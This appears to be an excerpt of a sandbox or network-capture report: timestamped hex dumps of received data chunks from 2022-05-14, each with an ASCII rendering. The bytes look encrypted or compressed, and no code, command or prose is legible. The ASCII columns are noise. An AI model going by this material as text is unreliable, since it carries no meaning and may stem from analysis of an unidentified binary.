                                                      2022-05-14 13:17:12 UTC541INData Raw: 0f 1f 68 1f cd 58 99 8c 5b c6 18 b4 8e 8c 86 29 8e 3c a5 a3 5b ea e5 90 6d 21 a4 8c 25 09 cf e9 86 2c f7 d6 35 26 a0 53 90 30 f2 74 d1 07 b9 e9 b6 1d 23 15 36 b9 44 a6 a5 85 8c 49 93 38 bf 77 ee 2c 50 c9 ef 60 e5 5f 85 67 93 d8 ba d2 ba 92 b9 f1 66 3f 91 d3 ce 5d a7 ae 26 b0 f1 69 c7 37 77 6e b5 8d 49 14 58 a1 72 ed ad 22 95 a9 0c 7c 5f ab a7 fe 55 fe 89 c3 76 50 44 3f fc 7c 5b 55 5d da f6 36 c3 25 4b 58 2f ae 7e 17 b3 a5 fc 3b eb 11 39 09 4a 7f 1c 11 ca 77 8e eb 51 98 ed c1 c2 57 8c 4b 8c e0 52 93 84 c8 58 dd a5 9d ce 4f 31 f4 c1 39 64 38 21 a3 21 c9 8f 1a a0 3c 1f b5 6e 9e 78 da 3c 04 35 3d 0c 10 d9 38 4d e7 fa 7c c8 88 0d e4 b6 c8 fd 38 a2 a1 d5 bf 8b 87 96 cc 67 fe 74 67 84 2b 5b 0a a3 ca 48 82 c0 60 d5 f7 3b f1 e6 69 81 54 c7 85 e1 4f c7 41 3c a4 18
                                                      Data Ascii: hX[)<[m!%,5&S0t#6DI8w,P`_gf?]&i7wnIXr"|_UvPD?|[U]6%KX/~;9JwQWKRXO19d8!!<nx<5=8M|8gtg+[H`;iTOA<
                                                      2022-05-14 13:17:12 UTC545INData Raw: 21 06 be 50 47 6d ad 27 79 0f 90 27 ee 98 02 2a dc dd 5d e2 be d0 61 be ab e8 01 b6 f5 ad d5 cb 9a fb 99 41 6c 12 94 f3 78 a5 50 68 7e 38 0c 60 57 b5 8c 48 a5 6a 7a da de e5 cb 34 e7 52 b6 18 1a 3a ab 2a 62 86 6f 98 88 fd 84 ae 9e 5e 3b 34 a1 00 63 3f 62 65 30 e9 89 26 9a 63 36 94 3c 31 88 71 e5 b0 99 1f 52 b1 5f 92 c3 da d9 23 9e 43 c4 cc 9e 4e 8a 97 ef 7e a3 c7 5b 78 75 2c b7 35 01 69 aa ee e1 f2 e3 9d 2e 00 aa ed 01 a9 7f 6d e6 5f 0c f2 6a 39 d6 36 1f 36 05 14 00 ce 9b 81 5f f3 be 90 3c 4e 75 d2 b3 6b 6d 70 1a 67 32 b3 d6 56 57 ab d3 7f 6c fb 16 90 80 9b 4d be 26 96 ec 9a 20 f9 67 78 40 fd f2 04 db e5 2e d0 b1 ed a5 39 d0 3b d9 b1 a7 85 65 af 85 2d 96 33 9b 19 ca ce 8d dd 7d 04 db 4d 5a cc b6 31 6b d4 05 05 e8 40 be 2c de be 3c 2e 8d cb c5 de d1 f1 2d
                                                      Data Ascii: !PGm'y'*]aAlxPh~8`WHjz4R:*bo^;4c?be0&c6<1qR_#CN~[xu,5i.m_j966_<Nukmpg2VWlM& gx@.9;e-3}MZ1k@,<.-
                                                      2022-05-14 13:17:12 UTC550INData Raw: c4 8f 38 a1 8a c2 cb cd e6 af e1 b6 f5 a1 2c df 6e 6c e5 78 91 67 8b d9 f9 68 f8 bf 84 8f 13 b1 fa 26 81 c4 3d d0 0a 9d e9 e9 47 27 ae ad bd 23 01 9c 1d e8 a6 c4 7e dd df b0 88 00 af 6a 2b d0 fe 31 6f 7a a1 b2 63 35 7f b5 7d 0c ec 1a 58 49 bc b7 ea 86 da a4 21 46 cb c1 c7 1d ad 11 e5 b2 f8 d1 f1 bd e2 74 b8 23 25 a9 69 d3 16 4c c0 c5 de 05 1b ae 8f f8 da 24 27 1a a6 81 78 24 e8 41 c8 93 4b b8 c5 7c 06 0c 5c a0 42 5e 05 30 41 4f 15 41 01 c2 6f 83 97 da e9 f2 f0 26 db d9 2c 7d 54 45 0d 1b b6 8e 35 9e 45 70 7f 24 11 36 05 25 ba 9f f2 b9 c1 e0 25 40 ca 67 3e 52 5d 2a dd 7a 46 04 6e b8 9c 14 27 14 7f df c1 4c 54 3d 45 d6 a6 05 7c 12 44 da 00 ab d8 d7 57 6d ae fa 2e b9 6b 54 54 c6 9a 1d e8 56 07 61 8a d4 f1 dc c2 3c 56 c1 ed 6f 3d b6 a6 7c 8e b0 a3 0d 8a 8a e2
                                                      Data Ascii: 8,nlxgh&=G'#~j+1ozc5}XI!Ft#%iL$'x$AK|\B^0AOAo&,}TE5Ep$6%%@g>R]*zFn'LT=E|DWm.kTTVa<Vo=|
                                                      2022-05-14 13:17:12 UTC554INData Raw: 58 1f dd b2 24 e3 3c 20 30 36 5a c4 28 4e 8b 2b 77 50 9a 4c fb a5 c1 6d 63 df 20 ab f5 0c 41 aa e8 3b 7e c9 b7 d9 11 ff 28 12 b4 ed a0 3f b0 71 e0 e5 42 3a 5e 01 39 1d 5d 58 6c 72 6e 71 bb 1a 09 51 22 45 cf 0c f8 23 b9 92 04 5b 84 85 ff b3 48 2b eb 0d a0 94 c5 f3 c8 75 e2 44 cc 7d 8a ea c6 50 3c 50 ed 9e fe d1 05 bb c9 d0 f2 3b 8f 78 27 36 c3 3a 74 e9 bb 4c ef ff 06 6c 6b e2 54 21 19 a4 6b 67 2c 51 cf 57 08 90 2d 66 83 c9 fe 86 b8 c9 d4 8e 4c e9 a1 12 98 94 8f 32 b9 e3 24 24 19 a8 f5 dc ea 55 4a 91 0e 00 5c 58 74 88 e9 b0 4d 74 f2 9b c4 5e 93 92 22 b4 82 3b 7a f5 20 c6 e4 92 69 b8 a2 94 9f bd 9d 99 07 e1 c4 91 00 7e 85 ec 02 a9 a1 52 43 42 40 bb 67 f7 e8 a4 33 66 b9 89 73 5e 4b 42 c4 70 bf c9 9c f4 4b 1d 0a 63 8e bf cd 8a 78 23 76 ab 04 4d 3b 0d 8e 75 d3
                                                      Data Ascii: X$< 06Z(N+wPLmc A;~(?qB:^9]XlrnqQ"E#[H+uD}P<P;x'6:tLlkT!kg,QW-fL2$$UJ\XtMt^";z i~RCB@g3fs^KBpKcx#vM;u
                                                      2022-05-14 13:17:12 UTC558INData Raw: 2e 09 b4 5c 16 c1 8a e2 06 73 8b d1 40 4a ea a7 87 61 13 12 ec 63 f6 a7 51 cd df 5c 7d 2b 53 f5 fd 16 51 18 ca d3 fe ad 61 32 52 3c 52 28 2f 6e 8b ed 10 f1 a7 9d a7 b3 e9 2e 8a e6 6e 16 b9 3f 14 28 a6 ca e3 f0 1b bf dd 67 27 05 de c0 8f 06 25 81 56 7e 9d e4 01 e4 14 02 51 3c ca 67 3a 5c 91 5b 4c 8a c5 c3 75 cf 3e 27 6d f5 d4 77 fd 1c 88 22 35 e2 ad f0 60 5c 63 ff b5 32 07 2d 1e d3 de f8 3f 4e 90 24 46 4d a5 f3 4b 8a 57 a5 d1 8f 5f c4 52 bb a3 bb 40 e0 7e 78 e1 ae 8e e5 3f 38 7d 4c b1 3b 36 5e be 62 7e 14 9c fa b7 63 d4 18 b8 c8 1f d8 57 58 8c f2 1b da 8e 68 d4 89 67 d5 5c ed d5 b7 3b d1 ba bc c4 23 c9 9e c4 fc 44 0a d1 d1 ab 12 de c6 56 57 31 30 d1 72 6c c7 e2 5f 53 67 71 f7 2e 04 8b fd 1b 24 d3 ce 49 48 63 46 21 45 92 17 d2 d8 43 bd 0e 90 7d 43 39 fa af
                                                      Data Ascii: .\s@JacQ\}+SQa2R<R(/n.n?(g'%V~Q<g:\[Lu>'mw"5`\c2-?N$FMKW_R@~x?8}L;6^b~cWXhg\;#DVW10rl_Sgq.$IHcF!EC}C9
                                                      2022-05-14 13:17:12 UTC562INData Raw: 3d 18 94 8f 8f be 05 a9 64 1f 38 ae 8a 39 58 15 90 f4 23 bc e8 d9 e7 79 4f 02 c0 01 d6 6b 8c e9 e3 40 e4 83 29 95 32 17 b2 90 a8 9f 50 73 9f d7 cd 73 db 25 15 54 be f0 63 33 9c ed 1f fc 46 81 0e f5 38 86 13 fc 1c 28 d9 06 61 ac b7 de 8a a2 c2 49 a8 f6 b6 34 78 02 79 dd a6 48 6f e2 64 e6 6f 89 16 2e 1d cf 24 76 2e ae e0 ca 50 2d c4 91 0d c5 24 bb 3b bf 5e b6 db 49 c5 96 be 60 aa 20 f1 82 af 68 32 19 47 86 79 f1 fa 2c 20 96 7f a9 55 ea 69 72 7b 71 50 87 2d dd 16 7c 1a 16 3d fd 2e b8 be 0b 18 0f ee 34 a5 68 e0 80 c0 08 0c cf 92 50 81 23 06 65 d4 d1 ac 32 92 43 79 9f 25 b5 11 7e 8d b8 3a 30 68 62 c8 ba fb e3 06 36 7c 71 33 29 c8 68 fc 15 a8 1b 20 ab 67 5b b7 90 5e 53 81 78 ab 28 c3 e8 1b 9b 99 83 9b f0 6f 6f eb a3 ac b2 82 2a 23 14 d3 7c 79 5d 98 4e 24 a9 cf
                                                      Data Ascii: =d89X#yOk@)2Pss%Tc3F8(aI4xyHodo.$v.P-$;^I` h2Gy, Uir{qP-|=.4hP#e2Cy%~:0hb6|q3)h g[^Sx(oo*#|y]N$
                                                      2022-05-14 13:17:12 UTC566INData Raw: c2 3a 68 1b 86 ce 9e 4d 87 ae 8b 5f 38 48 b3 58 dd a3 68 81 a9 34 60 ce 8c 99 8d c1 b8 49 b6 d5 71 3d 12 2e 78 a8 a9 85 cf 2b 68 6c e1 31 42 1f 77 fd ea 4f 0a 67 1e e2 11 4a 41 3e ef e1 a3 5f 9d 1a a3 5c c5 25 75 b1 64 74 d7 7e 97 9c 29 7f 48 0d b8 d8 6a 44 75 6e c1 5c 58 35 2d ea 2e 7d 98 bb f5 b6 6d 41 d6 e0 17 15 d5 61 5a cd 14 c3 79 52 81 b4 2e f0 78 77 8b 28 a4 62 f8 41 34 df 9e 43 f2 ae 0b fd 8c 4d 28 d7 30 94 e9 46 d0 2a a2 d1 0f 91 fa 66 df e0 cc 86 ca de 2e 0d 03 57 15 9f 20 11 d9 18 c4 e0 0a a7 70 14 5b 2e 30 8b 49 f1 29 71 7c 27 13 70 2e a1 cd bf ad 77 b2 2f 38 07 93 8b 21 fa 58 4c 26 ef c6 6f bd 31 ee 6c f7 09 87 2f b6 45 55 82 57 b0 bd a8 3c 22 bb 3d 8c f5 d9 a8 b3 3c 43 85 7f d2 c9 ef ce cf 38 d9 21 d9 51 65 b1 47 4e 39 2e a2 a2 1c 79 54 ff
                                                      Data Ascii: :hM_8HXh4`Iq=.x+hl1BwOgJA>_\%udt~)HjDun\X5-.}mAaZyR.xw(bA4CM(0F*f.W p[.0I)q|'p.w/8!XL&o1l/EUW<"=<C8!QeGN9.yT
                                                      2022-05-14 13:17:12 UTC570INData Raw: 11 f1 b3 24 ec db 63 dd 72 1f e8 71 bc b1 8c 2a 2a 6a 07 9c 17 b7 86 22 2b 2d d6 9b fc 7b a4 a6 5a 0a ad b0 1f 2a c0 53 52 17 11 4c 99 69 7f 11 cf ea c3 ab 77 5a fc 6a 16 6f e1 17 96 ec 56 f4 49 c7 34 0c 5f 86 47 53 44 ec d3 eb 10 e9 a4 aa 3c 17 96 d5 8a 74 55 86 b7 d8 26 2c 18 73 4e 5e a7 65 fd b6 26 5d fa 11 93 5d 01 fe cb 72 65 7d 23 bc 2f e2 37 b5 a1 c4 c5 e9 26 3b 17 01 84 14 c7 c8 32 bc ae 64 bd 87 43 6e e9 79 7e 4b e7 ed 92 ee 62 e1 ca 52 73 23 2d da 6d 1b a1 ce 9e 66 3d 5b 98 b1 04 95 14 b9 28 78 0b 7f 0a 52 91 e2 f4 27 53 8a 61 f2 aa c8 82 b2 e4 cd 24 85 00 5b 29 ce 27 9f a4 22 10 5e 4c f0 66 74 26 de 4c ff d1 6d 6f f2 1f 56 7b 6c 7f 58 1e 77 bf b9 03 62 a8 fc 89 dc 23 1b 5c de ce 4e 51 b5 28 82 37 66 d0 38 8e 0b cf 98 d7 c3 fc 03 2e db e2 66 d4
                                                      Data Ascii: $crq**j"+-{Z*SRLiwZjoVI4_GSD<tU&,sN^e&]]re}#/7&;2dCny~KbRs#-mf=[(xR'Sa$[)'"^Lft&LmoV{lXwb#\NQ(7f8.f
                                                      2022-05-14 13:17:12 UTC573INData Raw: e2 89 77 8a e7 c7 45 50 a2 96 cb ad 6a c1 8a 00 5d 97 0a f8 9d e3 6d e3 3d 88 0f ce 43 0d 16 c2 87 a5 f3 bd 2e 7f f9 19 00 86 41 41 32 d8 30 59 9e ad 19 27 aa 97 17 c9 7b c0 f5 3b 77 2d 54 8f e6 ff c4 da 8e fe f7 6d 43 84 c1 7c b2 09 c1 05 03 98 d2 c4 a0 6e 60 ab e8 f4 28 0d 00 ce 6b 47 3f 29 3e 46 6e de cd bc ac 50 f7 a2 c1 0c b7 15 7c 81 8c 9e de cd 0e ea 55 98 f4 eb 54 26 f7 09 aa b2 4e 14 3e 52 82 a2 dd 3f 3f 5b 2b 82 7a 1d 75 64 b2 1d be e1 cc cf aa 1b a2 bd ee 32 67 6d 7d 62 f7 45 56 eb 28 db c1 f1 e3 ef bd 88 bc c4 69 b0 b7 06 95 17 2a aa 17 d8 6a 9c 91 eb 74 e6 19 77 a4 f6 01 43 b9 85 3a d5 c6 0c 2e 0c fb fc 33 22 9f 59 9c cd 93 98 d3 29 2d bf 12 54 d5 80 ce f5 0f 83 7b c2 33 d6 b6 41 7f dc 99 76 4e 67 a6 2b 0e 3b 88 a0 0a 13 fa 9c f8 67 a6 1d 24
                                                      Data Ascii: wEPj]m=C.AA20Y'{;w-TmC|n`(kG?)>FnP|UT&N>R??[+zud2gm}bEV(i*jtwC:.3"Y)-T{3AvNg+;g$
                                                      2022-05-14 13:17:12 UTC577INData Raw: 84 87 6a ab 92 04 94 4a cf df b0 4c bd 66 52 a8 b0 db 22 aa b1 82 59 e2 4b c7 a9 f7 1c d1 61 0b d9 2d 03 ea 58 61 ca 30 28 ab 2e ad c0 3f 5d 06 a5 9c 80 85 43 d5 72 86 dd 51 63 3e 78 d4 fa 4b 34 f3 9b 39 20 67 0e 16 c7 82 ea 19 2b 82 8b bd 13 b3 d3 70 63 ab 02 32 b9 85 74 5e ba d4 8e d9 c4 20 1a 0f 5e 8a 0c 7d 27 4c aa 70 da be 83 03 a2 1e 52 ae e1 60 ef f9 b2 58 18 71 9d 57 6f 6b df b2 04 47 ab ec a2 2a a3 ca 3a 21 22 13 ba 49 bd 3c d1 6c 60 c9 da 50 5f 0b dc 8b f8 75 ec 48 48 14 c2 e2 81 89 df 49 fa 83 fa 89 4a b5 45 4d 66 2a 63 0f e5 6e 7a a0 1f 79 7f 1a da 95 bf f1 d0 70 56 fc 62 e5 c4 0b 32 f0 96 b0 4d c5 d5 05 52 24 99 2a e0 35 fb 56 cd 8a 5e 64 0f f1 30 fd 47 05 5b d1 b4 4a 89 05 16 ee 54 11 7f 0e 68 ab 4c b6 4c 68 99 f5 d7 1d 95 8f ac 1d f3 3e a1
                                                      Data Ascii: jJLfR"YKa-Xa0(.?]CrQc>xK49 g+pc2t^ ^}'LpR`XqWokG*:!"I<l`P_uHHIJEMf*cnzypVb2MR$*5V^d0G[JThLLh>
                                                      2022-05-14 13:17:12 UTC582INData Raw: d8 6d 9e df c6 e9 98 71 c9 f2 a0 a4 7d ef 8a 1d 32 50 c5 f4 e6 f0 33 97 5f 34 3c 64 65 92 4c 54 89 85 93 50 98 ca 73 64 ca 70 f5 59 45 25 06 01 f1 ad dd 98 68 09 89 9c b0 03 cc 31 0a da ee 23 12 6a 0f 2f 4c e9 d5 bf da 27 f0 c8 81 ad 53 29 7d 30 e4 4b 68 a6 22 b4 e0 e9 c9 fb 80 89 cc 1b d7 f1 86 e8 4c 28 01 33 fe 5d d9 27 26 65 fa b4 ee 24 b2 87 62 84 23 3c 25 81 0c f9 47 8d f2 e9 2e c6 e6 dd d0 e2 da ec 47 ba a8 e1 95 2b d3 80 1d 10 59 3f bc a7 93 73 e8 67 63 a4 5d 1c 0e 3f 8c f4 62 e0 cb ec 06 b7 21 e0 47 bf 0a 03 d3 37 6f c0 83 9f 53 6b 72 b2 51 0c 6f 77 03 f2 b5 88 97 2d 13 77 1e 54 e4 38 30 92 0a fc 96 e2 b0 66 08 bf 0a 2f 87 c4 2e 91 95 1a 1e 88 e5 ab 91 6b 9f 4d ee 80 17 16 07 a5 d9 9b 9f d5 d1 23 04 5a 32 02 55 f7 a7 96 6a 48 ca 70 e8 c5 64 e9 ab
                                                      Data Ascii: mq}2P3_4<deLTPsdpYE%h1#j/L'S)}0Kh"L(3]'&e$b#<%G.G+Y?sgc]?b!G7oSkrQow-wT80f/.kM#Z2UjHpd
                                                      2022-05-14 13:17:12 UTC586INData Raw: 84 71 b7 4b a1 2d 99 fe cb e6 95 8e ce 5f 75 25 42 a5 5e b5 7d 43 29 9b 37 47 81 a6 4f f2 74 65 e1 86 27 21 6a 98 6f 15 9f 44 c3 f3 b8 33 59 7c db ed fa 92 c2 4f 67 98 16 e5 df 38 02 69 18 4f 18 80 c3 c2 f2 6e 39 94 e4 a1 fd 08 26 89 cb b6 3f ce 26 40 f2 e7 50 2f 09 d0 81 37 ac dd ec 1c 03 90 86 5d 21 38 78 83 f6 ce c8 dd 31 7c c4 90 7f 94 61 3b 1d 25 f7 48 0f 6c 67 32 03 7b ec 87 86 5e a7 6e ae 2a 9f e4 64 71 f1 8d 11 d4 b4 da 51 a2 8d eb 67 71 9d a0 61 09 16 74 f1 45 c9 c8 42 92 a6 56 ac b2 e8 4f 69 d8 dc b1 7a 5b 93 75 63 a2 56 5d c4 f1 e3 af 3b 24 32 4f 4c ca 3f 21 1c 7d 1c 69 d7 d0 4a 57 31 87 d8 63 bf 6d 09 78 7c ca 79 00 c0 b6 9f e8 ff 6c 88 64 60 93 7b b3 96 0c 5e 74 43 df 49 fc 6e 24 23 14 33 bf 60 ed 4b 1c a3 dc 71 fd 12 cd 62 10 64 30 d9 cb 92
                                                      Data Ascii: qK-_u%B^}C)7GOte'!joD3Y|Og8iOn9&?&@P/7]!8x1|a;%Hlg2{^n*dqQgqatEBVOiz[ucV];$2OL?!}iJW1cmx|yld`{^tCIn$#3`Kqbd0
                                                      2022-05-14 13:17:12 UTC590INData Raw: 65 f3 2a 2d be 6c 3a 5f ac 91 34 cb 3e 23 26 de e8 19 b9 c1 a1 44 2c e6 22 26 92 17 50 1d f9 ec 30 a6 a9 c4 e6 36 ab 2b 8e 69 e7 52 88 ac 56 2a 28 0e 85 2e 6a 6d a9 52 68 ad cc 97 1e 77 9e 22 65 38 56 b1 4c c7 d7 86 9d ee 75 09 f4 8f e6 65 3a ac 01 51 90 3c 29 7a 27 62 77 32 fc 67 9e 85 d0 a4 3b e0 b8 6a d3 32 6d f1 a1 01 b8 0b ed 7e 12 9e 1a c0 02 aa d1 d9 9e b6 3c 5e 6b 64 3e 28 1b 9f 1c 60 0a e1 3a 96 f1 02 0f 34 62 e2 95 be 53 b0 5e bb 0b 2a cd 24 03 9c e7 33 51 37 42 ab de c6 ce ab 0d f4 22 cd 4b 26 40 03 5f 13 29 57 78 6e ef 03 f1 f1 2a a1 0e d5 72 20 dc 94 ad b2 9f 11 f4 5c 78 8c 89 48 15 99 d3 30 e2 93 22 0d 44 63 ee d6 56 00 d5 5d e2 ba 62 61 92 6f 48 08 f9 8b 42 c0 0c bb 93 c7 5f ab 1e 7d 0d bd 7b 9c d3 82 9d 46 f0 e8 7a ea 63 45 e0 03 91 a3 88
                                                      Data Ascii: e*-l:_4>#&D,"&P06+iRV*(.jmRhw"e8VLue:Q<)z'bw2g;j2m~<^kd>(`:4bS^*$3Q7B"K&@_)Wxn*r \xH0"DcV]baoHB_}{FzcE
                                                      2022-05-14 13:17:12 UTC594INData Raw: f6 92 00 a9 a0 4f 71 ff 78 95 b1 9a 56 0d 0b 65 97 47 37 45 14 d0 76 7e b0 d1 1b d4 2e d1 ec 23 b9 85 53 3d 14 6b 93 96 ed 60 fa 3d 16 6e a6 dc f9 30 2d a3 42 f5 00 58 c7 c0 ee 58 54 6f 25 f8 bc 94 c3 ac eb 8c 67 41 73 92 68 24 2f 9b 5d 11 af aa d1 bd c1 45 b9 f0 07 3e 05 c5 49 e6 d7 48 35 1c 33 f5 49 d9 f7 f0 05 e6 9e 8e 58 8b 18 c0 14 33 d9 54 07 1e f2 13 10 70 69 07 ed 8c ed 2d c6 6c ac 8c 49 53 a7 bf a1 45 21 6e 41 f9 94 dd 8f c7 92 49 a0 e8 57 a3 54 1e d7 96 e7 c7 bf fa 48 57 89 fa f7 a5 c4 73 14 3b cb 85 4a 37 e2 80 9d a3 0f 54 05 09 f9 72 af 8c 9c 1c 0f e3 1b 83 68 a6 6f 5e de 50 06 b2 97 59 1e 69 f4 b6 1c ed 48 25 57 b9 9c 74 00 0e 29 80 db 9e 11 62 33 e5 67 94 54 f8 85 e5 d2 82 43 d1 34 e1 f2 25 f7 48 fb c6 8e de 90 23 79 db 54 01 17 1a 76 2e 61
                                                      Data Ascii: OqxVeG7Ev~.#S=k`=n0-BXXTo%gAsh$/]E>IH53IX3Tpi-lISE!nAIWTHWs;J7Trho^PYiH%Wt)b3gTC4%H#yTv.a
                                                      2022-05-14 13:17:12 UTC598INData Raw: b1 71 b1 8a 7f d5 29 a5 40 ca c6 ac 82 d3 28 c6 e2 f7 63 70 8b ff b8 dc ab a0 07 0b d2 d6 c9 aa 31 b9 50 59 fb 9e 5d 0c 61 54 a7 7b 1e 94 35 00 a5 a8 a5 58 3b 31 10 3d af 9f b0 9a ad b9 a2 1e 5a 63 58 0e 87 f6 ce 7f 68 68 f4 ba 56 6d c9 bc 70 6a 82 17 ab 7e 33 7e 65 a2 7e a3 18 4e 72 4e b2 47 f6 30 92 5c 1f cd bb c3 25 1e 71 d9 be bd 7d 70 00 5c 21 ea 1a fb 55 97 66 8d 3b 50 16 00 25 95 fb 3a 60 bd 33 30 63 32 3e b9 29 a1 99 45 27 50 c8 b4 43 1f 18 24 9c 50 93 d5 11 c3 93 32 bd 1e cb a4 12 c6 d7 52 35 15 49 e9 8b 45 3a bd 5c 74 24 05 60 59 86 d7 39 a9 76 03 ec ed 1e 65 5a 4d 82 a7 14 6d 47 97 c4 d7 fe df b5 13 96 1f 86 8d 5d 04 5f 2b 60 40 c9 2e a3 da 18 bb 3f c7 81 df 13 55 26 6f 7b 9c f8 4b 49 14 bc 02 8b 72 8c 43 56 ca 68 7b 21 75 1a 81 56 12 7f c8 78
                                                      Data Ascii: q)@(cp1PY]aT{5X;1=ZcXhhVmpj~3~e~NrNG0\%q}p\!Uf;P%:`30c2>)E'PC$P2R5IE:\t$`Y9veZMmG]_+`@.?U&o{KIrCVh{!uVx
                                                      2022-05-14 13:17:12 UTC602INData Raw: f3 9e 25 29 f4 5f 13 b5 34 38 c9 e2 6e f1 ee 17 2b 83 35 04 57 3f b2 58 19 43 74 94 c4 88 9d 7c e6 01 42 a0 0a 23 13 0d 18 ec d2 d1 d5 ea 8e 3f fc 0c dc 90 2f 89 d0 f4 cd e3 b3 b5 8d 7e ad 5c eb ed b0 4b 13 a0 54 d3 10 3a aa 14 6c 29 31 9c 71 df 4c 3d 80 e1 d5 e0 61 f0 ca 43 bd b0 cd ff 6d f7 12 94 36 8e 96 51 15 06 01 b1 95 fc f5 60 a6 cc 1e 8c a9 96 ae af e4 c9 74 87 be d6 3a 61 8c 60 c7 a9 32 62 b2 24 8c d2 8e 14 f6 ec e0 5a ec 4c 7f fd 38 0b f0 d8 7e bb 3e 2d 17 dd a1 63 c5 3c 83 d2 88 f2 15 22 64 a6 7c 0d 42 b5 33 f9 a9 47 78 1b ea 38 44 ed b6 75 fa f1 1d b8 ea 89 b9 a0 8c 64 6b 14 31 46 60 86 f9 32 10 e6 12 50 c1 33 27 1d cf e3 56 6b 9a b9 50 7b 50 ee af 18 00 b1 59 4f 49 58 34 93 84 e8 c2 33 b3 87 59 55 b1 4a 60 55 dc b9 33 27 05 ed 87 0c e9 cf f0
                                                      Data Ascii: %)_48n+5W?XCt|B#?/~\KT:l)1qL=aCm6Q`t:a`2b$ZL8~>-c<"d|B3Gx8Dudk1F`2P3'VkP{PYOIX43YUJ`U3'
                                                      2022-05-14 13:17:12 UTC605INData Raw: 4a 67 f1 1f bc 61 74 82 73 3c 75 b4 1d c2 68 e3 5e e8 9e 15 34 e9 4a 33 0c 8e 32 89 94 ef d9 06 fe 0a 73 c3 21 0a f8 0e f7 17 a4 d0 9a a7 c0 3d f6 29 97 af c3 bd f4 42 48 f2 94 06 d9 d2 d4 bd 5d 60 05 ac 9f c3 ef 56 fc d0 4c f7 c5 64 76 f9 c7 e3 c1 7b cb dc 17 c0 bc 1f 89 45 d5 24 f5 9f bd a4 f4 4f dd 8a c8 3b 23 75 24 ea 50 52 08 5c 8e 52 c9 5b 0a 8b 1e 89 85 40 46 6b 01 15 87 01 7e b2 99 c4 f9 74 2f ba d0 fc c0 9e 1e 09 f8 3e a8 d4 60 1f d4 d2 e3 c9 e8 82 a2 a9 f5 88 1a 65 4d c7 f1 fe 04 04 0d 3a d5 7f 3d b5 94 cf 24 f8 39 aa 83 c8 41 ac 41 fa ca 9b 91 ff 4c c9 af f8 64 b3 a5 6a 1e 70 65 d2 03 99 6c 1a 68 ee 90 00 a9 44 c3 59 3c 64 98 a5 f1 ac 04 b1 7e 54 ba 2b d8 df dc 3c 62 8c f4 60 28 2f e1 55 c0 c6 5e 16 5a fa 31 7d 46 72 fe bf 7c 26 63 68 12 a3 0d
                                                      Data Ascii: Jgats<uh^4J32s!=)BH]`VLdv{E$O;#u$PR\R[@Fk~t/>`eM:=$9AALdjpelhDY<d~T+<b`(/U^Z1}Fr|&ch
                                                      2022-05-14 13:17:12 UTC609INData Raw: 69 78 aa 22 b3 0a d6 ae 69 77 28 47 a3 6a 85 1e 75 c5 c6 d1 2f 92 f7 d8 96 8f ab d3 94 25 8a 41 80 70 dc ce 7f d9 ce 91 3e 13 36 8b c4 77 a2 fa 7b 68 a7 7d e6 9e 00 52 42 4a 7e 3d be e4 a3 b5 8b 41 ac 5d 0a f4 b7 ba ed cd a3 4f 39 c7 90 42 f2 91 6d 8f 65 96 12 ec 34 0d 72 fa ed 9c 09 80 89 bb 39 01 27 e9 3c 1e 1b 23 2d 7a 33 11 3a fc 45 da b0 61 0d 33 9d ca 08 aa c7 99 77 1f 2e f5 ab 1d 55 fb de 33 fd 9c f6 46 6a 26 9d 30 fd c5 af 85 23 2a 85 44 ff 4f da 6a 91 4e 95 64 42 c1 ce cb 76 5a 2c 5f 0a f8 e2 03 f6 62 c6 25 62 ce ba 33 48 5c 04 65 96 fc af 60 0a 47 1f ad cd 65 36 77 5d 7e c0 07 95 75 ca d5 95 06 13 bd 12 23 5a c9 3d a1 02 e7 64 51 3b 25 be 4b 73 f1 b1 dd 71 7d 96 75 4e e6 1c 9b 6d 1a f1 d7 12 1b 5b 66 ec a6 f7 4b 1d 0e 9d b0 53 52 fd 08 66 7d f0
                                                      Data Ascii: ix"iw(Gju/%Ap>6w{h}RBJ~=A]O9Bme4r9'<#-z3:Ea3w.U3Fj&0#*DOjNdBvZ,_b%b3H\e`Ge6w]~u#Z=dQ;%Ksq}uNm[fKSRf}
                                                      2022-05-14 13:17:12 UTC614INData Raw: 84 16 73 70 51 d3 73 50 26 f7 30 55 8b 9c fd d2 36 f1 f3 50 28 83 08 a7 68 c4 d9 b4 51 48 a6 98 36 44 cd a8 db 05 b2 63 e5 c7 47 da 73 82 62 e0 8e 43 86 b3 31 ca 5d 3a 7e 26 13 fe d6 f7 9c f0 da 1c 8b b3 11 b2 8d 9c a4 e1 ed 9f b7 1c 5d f9 a6 7d 09 22 c4 63 83 3d 71 a1 ff 55 6b ee c2 78 7e aa f6 87 73 fb bf d0 0a de 8b 51 18 88 20 78 98 08 0e 76 6b 6f b6 89 09 03 51 5e c8 61 7b da 09 98 d8 21 f4 90 72 9e cd 81 be f2 cd 16 e6 07 ad 11 87 ba 31 03 ab 56 29 cb 6b 0e be f8 26 f6 9b 58 64 61 db fc 0a 37 13 6c e6 c9 6b b0 c9 2d 23 e2 10 a1 50 c3 74 88 fe 3e 97 0f 73 b5 b4 43 70 96 f1 07 f4 3e e9 59 55 f7 d9 77 ee a2 e4 db c5 fe 91 0a ae 4f 31 03 b3 19 30 de d2 c3 42 8a a1 5d 17 fd 9d a8 82 a0 43 00 c9 bd 0b 13 94 ea f7 57 7b 2f 68 01 24 d5 60 20 e8 e8 9c 3f 71
                                                      Data Ascii: spQsP&0U6P(hQH6DcGsbC1]:~&]}"c=qUkx~sQ xvkoQ^a{!r1V)k&Xda7lk-#Pt>sCp>YUwO10B]CW{/h$` ?q
                                                      2022-05-14 13:17:12 UTC618INData Raw: cb 51 8e 51 7c 5e 83 f1 0c 01 8b c6 d8 3e 14 ec 6d d8 06 5e 93 38 89 d5 28 4a 4f 69 35 94 f6 96 2e 46 0a f3 12 d2 ca 24 7b 50 19 4f f6 32 60 7d 1b 07 8c a1 68 a9 4d 71 6b 3a 85 df 32 be de 30 bd 07 8d a9 be a7 11 91 73 be 5c e8 7d d2 32 ec 5b 82 d5 fb 98 8a 50 f4 cb 66 81 f8 96 98 52 3b 08 af 38 21 55 be 16 a6 c2 2f 68 0c 1a 6f 90 6d af ec 3d 42 69 02 5a 0d b8 fa 96 97 7d 76 1d b1 82 80 71 2c 4f 5e e2 0f ac ff 06 a0 30 7a e7 3a a9 28 49 08 96 12 e1 d1 41 a9 74 a3 b1 c6 2f 22 5c 46 cf 55 8c 11 bb 5c 34 19 98 73 ec 76 d9 1a 33 b1 a1 1c c9 2a f1 85 03 a3 8c e3 43 cc ea 5c 29 2b bc 4c 57 c2 12 36 99 83 91 2f 08 65 0d da 21 bb 65 30 ba 51 5f 8e 9c 0f 3b 25 a7 ae 6f 6d 33 bb a0 00 87 9d 79 3a 